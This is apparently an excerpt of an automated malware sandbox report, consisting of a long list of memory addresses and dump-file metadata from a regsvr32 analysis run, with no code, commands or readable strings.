                                                                                                      0x7ff87c117e5f
                                                                                                      0x7ff87c117e67
                                                                                                      0x7ff87c117e6f
                                                                                                      0x7ff87c117e77
                                                                                                      0x7ff87c117e7f
                                                                                                      0x7ff87c117e87
                                                                                                      0x7ff87c117e8f
                                                                                                      0x7ff87c117e97
                                                                                                      0x7ff87c117e9f
                                                                                                      0x7ff87c117ea7
                                                                                                      0x7ff87c117eaf
                                                                                                      0x7ff87c117eb7
                                                                                                      0x7ff87c117ebf
                                                                                                      0x7ff87c117ec7
                                                                                                      0x7ff87c117ecf
                                                                                                      0x7ff87c117ed7
                                                                                                      0x7ff87c117edf
                                                                                                      0x7ff87c117ee7
                                                                                                      0x7ff87c117eef
                                                                                                      0x7ff87c117ef7
                                                                                                      0x7ff87c117eff
                                                                                                      0x7ff87c117f07
                                                                                                      0x7ff87c117f0f
                                                                                                      0x7ff87c117f17
                                                                                                      0x7ff87c117f1f
                                                                                                      0x7ff87c117f27
                                                                                                      0x7ff87c117f2f
                                                                                                      0x7ff87c117f37
                                                                                                      0x7ff87c117f3f
                                                                                                      0x7ff87c117f47
                                                                                                      0x7ff87c117f4f
                                                                                                      0x7ff87c117f57
                                                                                                      0x7ff87c117f5f
                                                                                                      0x7ff87c117f67
                                                                                                      0x7ff87c117f6f
                                                                                                      0x7ff87c117f77
                                                                                                      0x7ff87c117f7f
                                                                                                      0x7ff87c117f87
                                                                                                      0x7ff87c117f8f
                                                                                                      0x7ff87c117f97
                                                                                                      0x7ff87c117f9f
                                                                                                      0x7ff87c117fa7
                                                                                                      0x7ff87c117faf
                                                                                                      0x7ff87c117fb7
                                                                                                      0x7ff87c117fbf
                                                                                                      0x7ff87c117fc7
                                                                                                      0x7ff87c117fcf
                                                                                                      0x7ff87c117fd7
                                                                                                      0x7ff87c117fdf
                                                                                                      0x7ff87c117fe7
                                                                                                      0x7ff87c117fef
                                                                                                      0x7ff87c117ff7
                                                                                                      0x7ff87c117fff
                                                                                                      0x7ff87c118007
                                                                                                      0x7ff87c11800f
                                                                                                      0x7ff87c118017
                                                                                                      0x7ff87c11801f
                                                                                                      0x7ff87c118027
                                                                                                      0x7ff87c11802f
                                                                                                      0x7ff87c118037
                                                                                                      0x7ff87c11803f
                                                                                                      0x7ff87c118047
                                                                                                      0x7ff87c11804f
                                                                                                      0x7ff87c118057
                                                                                                      0x7ff87c11805f
                                                                                                      0x7ff87c118067
                                                                                                      0x7ff87c11806f
                                                                                                      0x7ff87c118077
                                                                                                      0x7ff87c11807f
                                                                                                      0x7ff87c118087
                                                                                                      0x7ff87c11808f
                                                                                                      0x7ff87c118097
                                                                                                      0x7ff87c11809f
                                                                                                      0x7ff87c1180a7
                                                                                                      0x7ff87c1180af
                                                                                                      0x7ff87c1180b7
                                                                                                      0x7ff87c1180bf
                                                                                                      0x7ff87c1180c7
                                                                                                      0x7ff87c1180cf
                                                                                                      0x7ff87c1180d7
                                                                                                      0x7ff87c1180df
                                                                                                      0x7ff87c1180e7
                                                                                                      0x7ff87c1180ef
                                                                                                      0x7ff87c1180f7
                                                                                                      0x7ff87c1180ff
                                                                                                      0x7ff87c118107
                                                                                                      0x7ff87c11810f
                                                                                                      0x7ff87c118117
                                                                                                      0x7ff87c11811f
                                                                                                      0x7ff87c118127
                                                                                                      0x7ff87c11812f
                                                                                                      0x7ff87c118137
                                                                                                      0x7ff87c11813f
                                                                                                      0x7ff87c118147
                                                                                                      0x7ff87c11814f
                                                                                                      0x7ff87c118157
                                                                                                      0x7ff87c11815f
                                                                                                      0x7ff87c118167
                                                                                                      0x7ff87c11816f
                                                                                                      0x7ff87c118177
                                                                                                      0x7ff87c11817f
                                                                                                      0x7ff87c118187
                                                                                                      0x7ff87c11818f
                                                                                                      0x7ff87c118197
                                                                                                      0x7ff87c11819f
                                                                                                      0x7ff87c1181a7
                                                                                                      0x7ff87c1181af
                                                                                                      0x7ff87c1181b7
                                                                                                      0x7ff87c1181bf
                                                                                                      0x7ff87c1181c7
                                                                                                      0x7ff87c1181cf
                                                                                                      0x7ff87c1181d7
                                                                                                      0x7ff87c1181df
                                                                                                      0x7ff87c1181e7
                                                                                                      0x7ff87c1181ef
                                                                                                      0x7ff87c1181f7
                                                                                                      0x7ff87c1181ff
                                                                                                      0x7ff87c118207
                                                                                                      0x7ff87c11820f
                                                                                                      0x7ff87c118217
                                                                                                      0x7ff87c11821f
                                                                                                      0x7ff87c118227
                                                                                                      0x7ff87c11822f
                                                                                                      0x7ff87c118237
                                                                                                      0x7ff87c11823f
                                                                                                      0x7ff87c118247
                                                                                                      0x7ff87c11824f
                                                                                                      0x7ff87c118257
                                                                                                      0x7ff87c11825f
                                                                                                      0x7ff87c118267
                                                                                                      0x7ff87c11826f
                                                                                                      0x7ff87c118277
                                                                                                      0x7ff87c11827f
                                                                                                      0x7ff87c118287
                                                                                                      0x7ff87c11828f
                                                                                                      0x7ff87c118297
                                                                                                      0x7ff87c11829f
                                                                                                      0x7ff87c1182a7
                                                                                                      0x7ff87c1182af
                                                                                                      0x7ff87c1182b7
                                                                                                      0x7ff87c1182bf
                                                                                                      0x7ff87c1182c7
                                                                                                      0x7ff87c1182cf
                                                                                                      0x7ff87c1182d7
                                                                                                      0x7ff87c1182df
                                                                                                      0x7ff87c1182e7
                                                                                                      0x7ff87c1182ef
                                                                                                      0x7ff87c1182f7
                                                                                                      0x7ff87c1182ff
                                                                                                      0x7ff87c118307
                                                                                                      0x7ff87c11830f
                                                                                                      0x7ff87c118317
                                                                                                      0x7ff87c11831f
                                                                                                      0x7ff87c118327
                                                                                                      0x7ff87c11832f
                                                                                                      0x7ff87c118337
                                                                                                      0x7ff87c11833f
                                                                                                      0x7ff87c118347
                                                                                                      0x7ff87c11834f
                                                                                                      0x7ff87c118357
                                                                                                      0x7ff87c11835f
                                                                                                      0x7ff87c118367
                                                                                                      0x7ff87c11836f
                                                                                                      0x7ff87c118377
                                                                                                      0x7ff87c11837f
                                                                                                      0x7ff87c118387
                                                                                                      0x7ff87c11838f
                                                                                                      0x7ff87c118397
                                                                                                      0x7ff87c11839f
                                                                                                      0x7ff87c1183a7
                                                                                                      0x7ff87c1183af
                                                                                                      0x7ff87c1183b7
                                                                                                      0x7ff87c1183bf
                                                                                                      0x7ff87c1183c7
                                                                                                      0x7ff87c1183cf
                                                                                                      0x7ff87c1183d7
                                                                                                      0x7ff87c1183df
                                                                                                      0x7ff87c1183e7
                                                                                                      0x7ff87c1183ef
                                                                                                      0x7ff87c1183f7
                                                                                                      0x7ff87c1183ff
                                                                                                      0x7ff87c118407
                                                                                                      0x7ff87c11840f
                                                                                                      0x7ff87c118417
                                                                                                      0x7ff87c11841f
                                                                                                      0x7ff87c118427
                                                                                                      0x7ff87c11842f
                                                                                                      0x7ff87c118437
                                                                                                      0x7ff87c11843f
                                                                                                      0x7ff87c118447
                                                                                                      0x7ff87c11844f
                                                                                                      0x7ff87c118457
                                                                                                      0x7ff87c11845f
                                                                                                      0x7ff87c118467
                                                                                                      0x7ff87c11846f
                                                                                                      0x7ff87c118477
                                                                                                      0x7ff87c11847f
                                                                                                      0x7ff87c118487
                                                                                                      0x7ff87c11848f
                                                                                                      0x7ff87c118497
                                                                                                      0x7ff87c11849f
                                                                                                      0x7ff87c1184a7
                                                                                                      0x7ff87c1184af
                                                                                                      0x7ff87c1184b7
                                                                                                      0x7ff87c1184bf
                                                                                                      0x7ff87c1184c7
                                                                                                      0x7ff87c1184cf
                                                                                                      0x7ff87c1184d7
                                                                                                      0x7ff87c1184df
                                                                                                      0x7ff87c1184e7
                                                                                                      0x7ff87c1184ef
                                                                                                      0x7ff87c1184f7
                                                                                                      0x7ff87c1184ff
                                                                                                      0x7ff87c118507
                                                                                                      0x7ff87c11850f
                                                                                                      0x7ff87c118517
                                                                                                      0x7ff87c11851f
                                                                                                      0x7ff87c118527
                                                                                                      0x7ff87c11852f
                                                                                                      0x7ff87c118537
                                                                                                      0x7ff87c11853f
                                                                                                      0x7ff87c118547
                                                                                                      0x7ff87c11854f
                                                                                                      0x7ff87c118557
                                                                                                      0x7ff87c11855f
                                                                                                      0x7ff87c118567
                                                                                                      0x7ff87c11856f
                                                                                                      0x7ff87c118577
                                                                                                      0x7ff87c11857f
                                                                                                      0x7ff87c118587
                                                                                                      0x7ff87c11858f
                                                                                                      0x7ff87c118597
                                                                                                      0x7ff87c11859f
                                                                                                      0x7ff87c1185a7
                                                                                                      0x7ff87c1185af
                                                                                                      0x7ff87c1185b7
                                                                                                      0x7ff87c1185bf
                                                                                                      0x7ff87c1185c7
                                                                                                      0x7ff87c1185cf
                                                                                                      0x7ff87c1185d7
                                                                                                      0x7ff87c1185df
                                                                                                      0x7ff87c1185e7
                                                                                                      0x7ff87c1185ef
                                                                                                      0x7ff87c1185f7
                                                                                                      0x7ff87c1185ff
                                                                                                      0x7ff87c118607
                                                                                                      0x7ff87c11860f
                                                                                                      0x7ff87c118617
                                                                                                      0x7ff87c11861f
                                                                                                      0x7ff87c118627
                                                                                                      0x7ff87c11862f
                                                                                                      0x7ff87c118637
                                                                                                      0x7ff87c11863f
                                                                                                      0x7ff87c118647
                                                                                                      0x7ff87c11864f
                                                                                                      0x7ff87c118657
                                                                                                      0x7ff87c11865f
                                                                                                      0x7ff87c118667
                                                                                                      0x7ff87c11866f
                                                                                                      0x7ff87c118677
                                                                                                      0x7ff87c11867f
                                                                                                      0x7ff87c118687
                                                                                                      0x7ff87c11868f
                                                                                                      0x7ff87c118697
                                                                                                      0x7ff87c11869f
                                                                                                      0x7ff87c1186a7
                                                                                                      0x7ff87c1186af
                                                                                                      0x7ff87c1186b7
                                                                                                      0x7ff87c1186bf
                                                                                                      0x7ff87c1186c7
                                                                                                      0x7ff87c1186cf
                                                                                                      0x7ff87c1186d7
                                                                                                      0x7ff87c1186df
                                                                                                      0x7ff87c1186e7
                                                                                                      0x7ff87c1186ef
                                                                                                      0x7ff87c1186f7
                                                                                                      0x7ff87c1186ff
                                                                                                      0x7ff87c118707
                                                                                                      0x7ff87c11870f
                                                                                                      0x7ff87c118717
                                                                                                      0x7ff87c11871f
                                                                                                      0x7ff87c118727
                                                                                                      0x7ff87c11872f
                                                                                                      0x7ff87c118737
                                                                                                      0x7ff87c11873f
                                                                                                      0x7ff87c118747
                                                                                                      0x7ff87c11874f
                                                                                                      0x7ff87c118757
                                                                                                      0x7ff87c11875f
                                                                                                      0x7ff87c118767
                                                                                                      0x7ff87c11876f
                                                                                                      0x7ff87c118777
                                                                                                      0x7ff87c11877f
                                                                                                      0x7ff87c118787
                                                                                                      0x7ff87c11878f
                                                                                                      0x7ff87c118797
                                                                                                      0x7ff87c11879f
                                                                                                      0x7ff87c1187a7
                                                                                                      0x7ff87c1187af
                                                                                                      0x7ff87c1187b7
                                                                                                      0x7ff87c1187bf
                                                                                                      0x7ff87c1187c7
                                                                                                      0x7ff87c1187cf
                                                                                                      0x7ff87c1187d7
                                                                                                      0x7ff87c1187df
                                                                                                      0x7ff87c1187e7
                                                                                                      0x7ff87c1187ef
                                                                                                      0x7ff87c1187f7
                                                                                                      0x7ff87c1187ff
                                                                                                      0x7ff87c118807
                                                                                                      0x7ff87c11880f
                                                                                                      0x7ff87c118817
                                                                                                      0x7ff87c11881f
                                                                                                      0x7ff87c118827
                                                                                                      0x7ff87c11882f
                                                                                                      0x7ff87c118837
                                                                                                      0x7ff87c11883f
                                                                                                      0x7ff87c118847
                                                                                                      0x7ff87c11884f
                                                                                                      0x7ff87c118857
                                                                                                      0x7ff87c11885f
                                                                                                      0x7ff87c118867
                                                                                                      0x7ff87c11886f
                                                                                                      0x7ff87c118877
                                                                                                      0x7ff87c11887f
                                                                                                      0x7ff87c118887
                                                                                                      0x7ff87c11888f
                                                                                                      0x7ff87c118897
                                                                                                      0x7ff87c11889f
                                                                                                      0x7ff87c1188a7
                                                                                                      0x7ff87c1188af
                                                                                                      0x7ff87c1188b7
                                                                                                      0x7ff87c1188bf
                                                                                                      0x7ff87c1188c7
                                                                                                      0x7ff87c1188cf
                                                                                                      0x7ff87c1188d7
                                                                                                      0x7ff87c1188df
                                                                                                      0x7ff87c1188e7
                                                                                                      0x7ff87c1188ef
                                                                                                      0x7ff87c1188f7
                                                                                                      0x7ff87c1188ff
                                                                                                      0x7ff87c118907
                                                                                                      0x7ff87c11890f
                                                                                                      0x7ff87c118917
                                                                                                      0x7ff87c11891f
                                                                                                      0x7ff87c118927
                                                                                                      0x7ff87c11892f
                                                                                                      0x7ff87c118937
                                                                                                      0x7ff87c11893f
                                                                                                      0x7ff87c118947
                                                                                                      0x7ff87c11894f
                                                                                                      0x7ff87c118957
                                                                                                      0x7ff87c11895f
                                                                                                      0x7ff87c118967
                                                                                                      0x7ff87c11896f
                                                                                                      0x7ff87c118977
                                                                                                      0x7ff87c11897f
                                                                                                      0x7ff87c118987
                                                                                                      0x7ff87c11898f
                                                                                                      0x7ff87c118997
                                                                                                      0x7ff87c11899f
                                                                                                      0x7ff87c1189a7
                                                                                                      0x7ff87c1189af
                                                                                                      0x7ff87c1189b7
                                                                                                      0x7ff87c1189bf
                                                                                                      0x7ff87c1189c7
                                                                                                      0x7ff87c1189cf
                                                                                                      0x7ff87c1189d7
                                                                                                      0x7ff87c1189df
                                                                                                      0x7ff87c1189e7
                                                                                                      0x7ff87c1189ef
                                                                                                      0x7ff87c1189f7
                                                                                                      0x7ff87c1189ff
                                                                                                      0x7ff87c118a07
                                                                                                      0x7ff87c118a0f
                                                                                                      0x7ff87c118a17
                                                                                                      0x7ff87c118a1f
                                                                                                      0x7ff87c118a27
                                                                                                      0x7ff87c118a2f
                                                                                                      0x7ff87c118a37
                                                                                                      0x7ff87c118a3f
                                                                                                      0x7ff87c118a47
                                                                                                      0x7ff87c118a4f
                                                                                                      0x7ff87c118a57
                                                                                                      0x7ff87c118a5f
                                                                                                      0x7ff87c118a67
                                                                                                      0x7ff87c118a6f
                                                                                                      0x7ff87c118a77
                                                                                                      0x7ff87c118a7f
                                                                                                      0x7ff87c118a87
                                                                                                      0x7ff87c118a8f
                                                                                                      0x7ff87c118a97
                                                                                                      0x7ff87c118a9f
                                                                                                      0x7ff87c118aa7
                                                                                                      0x7ff87c118aaf
                                                                                                      0x7ff87c118ab7
                                                                                                      0x7ff87c118abf
                                                                                                      0x7ff87c118ac7
                                                                                                      0x7ff87c118acf
                                                                                                      0x7ff87c118ad7
                                                                                                      0x7ff87c118adf
                                                                                                      0x7ff87c118ae7
                                                                                                      0x7ff87c118aef
                                                                                                      0x7ff87c118af7
                                                                                                      0x7ff87c118aff
                                                                                                      0x7ff87c118b07
                                                                                                      0x7ff87c118b0f
                                                                                                      0x7ff87c118b17
                                                                                                      0x7ff87c118b1f
                                                                                                      0x7ff87c118b27
                                                                                                      0x7ff87c118b2f
                                                                                                      0x7ff87c118b37
                                                                                                      0x7ff87c118b3f
                                                                                                      0x7ff87c118b47
                                                                                                      0x7ff87c118b4f
                                                                                                      0x7ff87c118b57
                                                                                                      0x7ff87c118b5f
                                                                                                      0x7ff87c118b67
                                                                                                      0x7ff87c118b6f
                                                                                                      0x7ff87c118b77
                                                                                                      0x7ff87c118b7f
                                                                                                      0x7ff87c118b87
                                                                                                      0x7ff87c118b8f
                                                                                                      0x7ff87c118b97
                                                                                                      0x7ff87c118b9f
                                                                                                      0x7ff87c118ba7
                                                                                                      0x7ff87c118baf
                                                                                                      0x7ff87c118bb7
                                                                                                      0x7ff87c118bbf
                                                                                                      0x7ff87c118bc7
                                                                                                      0x7ff87c118bcf
                                                                                                      0x7ff87c118bd7
                                                                                                      0x7ff87c118bdf
                                                                                                      0x7ff87c118be7
                                                                                                      0x7ff87c118bef
                                                                                                      0x7ff87c118bf7
                                                                                                      0x7ff87c118bff
                                                                                                      0x7ff87c118c07
                                                                                                      0x7ff87c118c0f
                                                                                                      0x7ff87c118c17
                                                                                                      0x7ff87c118c1f
                                                                                                      0x7ff87c118c27
                                                                                                      0x7ff87c118c2f
                                                                                                      0x7ff87c118c37
                                                                                                      0x7ff87c118c3f
                                                                                                      0x7ff87c118c47
                                                                                                      0x7ff87c118c4f
                                                                                                      0x7ff87c118c57
                                                                                                      0x7ff87c118c5f
                                                                                                      0x7ff87c118c67
                                                                                                      0x7ff87c118c6f
                                                                                                      0x7ff87c118c77
                                                                                                      0x7ff87c118c7f
                                                                                                      0x7ff87c118c87
                                                                                                      0x7ff87c118c8f
                                                                                                      0x7ff87c118c97
                                                                                                      0x7ff87c118c9f
                                                                                                      0x7ff87c118ca7
                                                                                                      0x7ff87c118caf
                                                                                                      0x7ff87c118cb7
                                                                                                      0x7ff87c118cbf
                                                                                                      0x7ff87c118cc7
                                                                                                      0x7ff87c118ccf
                                                                                                      0x7ff87c118cd7
                                                                                                      0x7ff87c118cdf
                                                                                                      0x7ff87c118ce7
                                                                                                      0x7ff87c118cef
                                                                                                      0x7ff87c118cf7
                                                                                                      0x7ff87c118cff
                                                                                                      0x7ff87c118d07
                                                                                                      0x7ff87c118d0f
                                                                                                      0x7ff87c118d17
                                                                                                      0x7ff87c118d1f
                                                                                                      0x7ff87c118d27
                                                                                                      0x7ff87c118d2f
                                                                                                      0x7ff87c118d37
                                                                                                      0x7ff87c118d3f
                                                                                                      0x7ff87c118d47
                                                                                                      0x7ff87c118d4f
                                                                                                      0x7ff87c118d57
                                                                                                      0x7ff87c118d5f
                                                                                                      0x7ff87c118d67
                                                                                                      0x7ff87c118d6f
                                                                                                      0x7ff87c118d77
                                                                                                      0x7ff87c118d7f
                                                                                                      0x7ff87c118d87
                                                                                                      0x7ff87c118d8f
                                                                                                      0x7ff87c118d97
                                                                                                      0x7ff87c118d9f
                                                                                                      0x7ff87c118da7
                                                                                                      0x7ff87c118daf
                                                                                                      0x7ff87c118db7
                                                                                                      0x7ff87c118dbf
                                                                                                      0x7ff87c118dc7
                                                                                                      0x7ff87c118dcf
                                                                                                      0x7ff87c118dd7
                                                                                                      0x7ff87c118ddf
                                                                                                      0x7ff87c118de7
                                                                                                      0x7ff87c118def
                                                                                                      0x7ff87c118df7
                                                                                                      0x7ff87c118dff
                                                                                                      0x7ff87c118e07
                                                                                                      0x7ff87c118e0f
                                                                                                      0x7ff87c118e17
                                                                                                      0x7ff87c118e1f
                                                                                                      0x7ff87c118e27
                                                                                                      0x7ff87c118e2f
                                                                                                      0x7ff87c118e37
                                                                                                      0x7ff87c118e3f
                                                                                                      0x7ff87c118e47
                                                                                                      0x7ff87c118e4f
                                                                                                      0x7ff87c118e57
                                                                                                      0x7ff87c118e5f
                                                                                                      0x7ff87c118e67
                                                                                                      0x7ff87c118e6f
                                                                                                      0x7ff87c118e77
                                                                                                      0x7ff87c118e7f
                                                                                                      0x7ff87c118e87
                                                                                                      0x7ff87c118e8f
                                                                                                      0x7ff87c118e97
                                                                                                      0x7ff87c118e9f
                                                                                                      0x7ff87c118ea7
                                                                                                      0x7ff87c118eaf
                                                                                                      0x7ff87c118eb7
                                                                                                      0x7ff87c118ebf
                                                                                                      0x7ff87c118ec7
                                                                                                      0x7ff87c118ecf
                                                                                                      0x7ff87c118ed7
                                                                                                      0x7ff87c118edf
                                                                                                      0x7ff87c118ee7
                                                                                                      0x7ff87c118eef
                                                                                                      0x7ff87c118ef7
                                                                                                      0x7ff87c118eff
                                                                                                      0x7ff87c118f07
                                                                                                      0x7ff87c118f0f
                                                                                                      0x7ff87c118f17
                                                                                                      0x7ff87c118f1f
                                                                                                      0x7ff87c118f27
                                                                                                      0x7ff87c118f2f
                                                                                                      0x7ff87c118f37
                                                                                                      0x7ff87c118f3f
                                                                                                      0x7ff87c118f47
                                                                                                      0x7ff87c118f4f
                                                                                                      0x7ff87c118f57
                                                                                                      0x7ff87c118f5f
                                                                                                      0x7ff87c118f67
                                                                                                      0x7ff87c118f6f
                                                                                                      0x7ff87c118f77
                                                                                                      0x7ff87c118f7f
                                                                                                      0x7ff87c118f87
                                                                                                      0x7ff87c118f8f
                                                                                                      0x7ff87c118f97
                                                                                                      0x7ff87c118f9f
                                                                                                      0x7ff87c118fa7
                                                                                                      0x7ff87c118faf
                                                                                                      0x7ff87c118fb7
                                                                                                      0x7ff87c118fbf
                                                                                                      0x7ff87c118fc7
                                                                                                      0x7ff87c118fcf
                                                                                                      0x7ff87c118fd7
                                                                                                      0x7ff87c118fdf
                                                                                                      0x7ff87c118fe7
                                                                                                      0x7ff87c118fef
                                                                                                      0x7ff87c118ff7
                                                                                                      0x7ff87c118fff
                                                                                                      0x7ff87c119007
                                                                                                      0x7ff87c11900f
                                                                                                      0x7ff87c119017
                                                                                                      0x7ff87c11901f
                                                                                                      0x7ff87c119027
                                                                                                      0x7ff87c11902f
                                                                                                      0x7ff87c119037
                                                                                                      0x7ff87c11903f
                                                                                                      0x7ff87c119047
                                                                                                      0x7ff87c11904f
                                                                                                      0x7ff87c119057
                                                                                                      0x7ff87c11905f
                                                                                                      0x7ff87c119067
                                                                                                      0x7ff87c11906f
                                                                                                      0x7ff87c119077
                                                                                                      0x7ff87c11907f
                                                                                                      0x7ff87c119087
                                                                                                      0x7ff87c11908f
                                                                                                      0x7ff87c119097
                                                                                                      0x7ff87c11909f
                                                                                                      0x7ff87c1190a7
                                                                                                      0x7ff87c1190af
                                                                                                      0x7ff87c1190b7
                                                                                                      0x7ff87c1190bf
                                                                                                      0x7ff87c1190c7
                                                                                                      0x7ff87c1190cf
                                                                                                      0x7ff87c1190d7
                                                                                                      0x7ff87c1190df
                                                                                                      0x7ff87c1190e7
                                                                                                      0x7ff87c1190ef
                                                                                                      0x7ff87c1190f7
                                                                                                      0x7ff87c1190ff
                                                                                                      0x7ff87c119107
                                                                                                      0x7ff87c11910f
                                                                                                      0x7ff87c119117
                                                                                                      0x7ff87c11911f
                                                                                                      0x7ff87c119127
                                                                                                      0x7ff87c11912f
                                                                                                      0x7ff87c119137
                                                                                                      0x7ff87c11913f
                                                                                                      0x7ff87c119147
                                                                                                      0x7ff87c11914f
                                                                                                      0x7ff87c119157
                                                                                                      0x7ff87c11915f
                                                                                                      0x7ff87c119167
                                                                                                      0x7ff87c11916f
                                                                                                      0x7ff87c119177
                                                                                                      0x7ff87c11917f
                                                                                                      0x7ff87c119187
                                                                                                      0x7ff87c11918f
                                                                                                      0x7ff87c119197
                                                                                                      0x7ff87c11919f
                                                                                                      0x7ff87c1191a7
                                                                                                      0x7ff87c1191af
                                                                                                      0x7ff87c1191b7
                                                                                                      0x7ff87c1191bf
                                                                                                      0x7ff87c1191c7
                                                                                                      0x7ff87c1191cf
                                                                                                      0x7ff87c1191d7
                                                                                                      0x7ff87c1191df
                                                                                                      0x7ff87c1191e7
                                                                                                      0x7ff87c1191f8
                                                                                                      0x7ff87c119200
                                                                                                      0x7ff87c119205
                                                                                                      0x7ff87c119212
                                                                                                      0x7ff87c11921a
                                                                                                      0x7ff87c119224
                                                                                                      0x7ff87c11923e
                                                                                                      0x7ff87c119240
                                                                                                      0x7ff87c119248
                                                                                                      0x7ff87c11924a
                                                                                                      0x7ff87c119257
                                                                                                      0x7ff87c119263
                                                                                                      0x7ff87c119270
                                                                                                      0x7ff87c119275
                                                                                                      0x7ff87c11927c
                                                                                                      0x7ff87c119287
                                                                                                      0x7ff87c11928e
                                                                                                      0x7ff87c119294
                                                                                                      0x7ff87c11929d
                                                                                                      0x7ff87c11929f
                                                                                                      0x7ff87c1192a2
                                                                                                      0x7ff87c1192ae
                                                                                                      0x7ff87c1192b6
                                                                                                      0x7ff87c1192bb
                                                                                                      0x7ff87c1192d5
                                                                                                      0x7ff87c1192db
                                                                                                      0x7ff87c1192f5
                                                                                                      0x7ff87c119303
                                                                                                      0x7ff87c11931e
                                                                                                      0x7ff87c119320
                                                                                                      0x7ff87c119328
                                                                                                      0x7ff87c11932d
                                                                                                      0x7ff87c119330
                                                                                                      0x7ff87c119342
                                                                                                      0x7ff87c119358
                                                                                                      0x7ff87c11935f
                                                                                                      0x7ff87c11936a
                                                                                                      0x7ff87c119370
                                                                                                      0x7ff87c119372
                                                                                                      0x7ff87c119380
                                                                                                      0x7ff87c119382
                                                                                                      0x7ff87c119391
                                                                                                      0x7ff87c119396
                                                                                                      0x7ff87c11939e
                                                                                                      0x7ff87c1193a5
                                                                                                      0x7ff87c1193b8
                                                                                                      0x7ff87c1193bd
                                                                                                      0x7ff87c1193d0
                                                                                                      0x7ff87c1193d5
                                                                                                      0x7ff87c1193e1
                                                                                                      0x7ff87c119401

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
